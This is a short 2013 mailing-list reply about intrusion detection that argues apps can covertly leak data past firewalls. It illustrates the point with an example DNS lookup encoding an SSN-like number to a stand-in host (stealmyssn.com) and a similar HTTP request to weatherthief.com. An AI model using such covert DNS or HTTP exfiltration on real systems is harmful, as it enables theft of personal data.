[Tfug] Lightweight IDS options/strategy/policy

Bexley Hall bexley401 at yahoo.com
Wed Sep 25 16:28:28 MST 2013


Hi Kramer,

On 9/25/2013 3:57 PM, Kramer Lee wrote:
> "appears to only be "reading" from the outside world"
>
> Well, it depends on what they are reading.
>
> Probably the good info they get will be sent out encrypted.  If you
> have some NSA grade encryption busters, you can see what it is and
> maybe stop it.  If they have some NSA grade back-doors etc, they might
> be able to get whatever they want.

nslookup(123771665.stealmyssn.com)

I.e., if you let an app *look* at something, you have to assume
that it *can* pass that information to a third party despite
any firewalls, etc. that you put in place.

E.g., install a "weather reporting" app and the above could be passed
resolving http://www.weatherthief.com/currentweather/123771665.html

If the system runs 24/7/365 then it can covertly pass a *boatload*
of information without raising any eyebrows!




More information about the tfug mailing list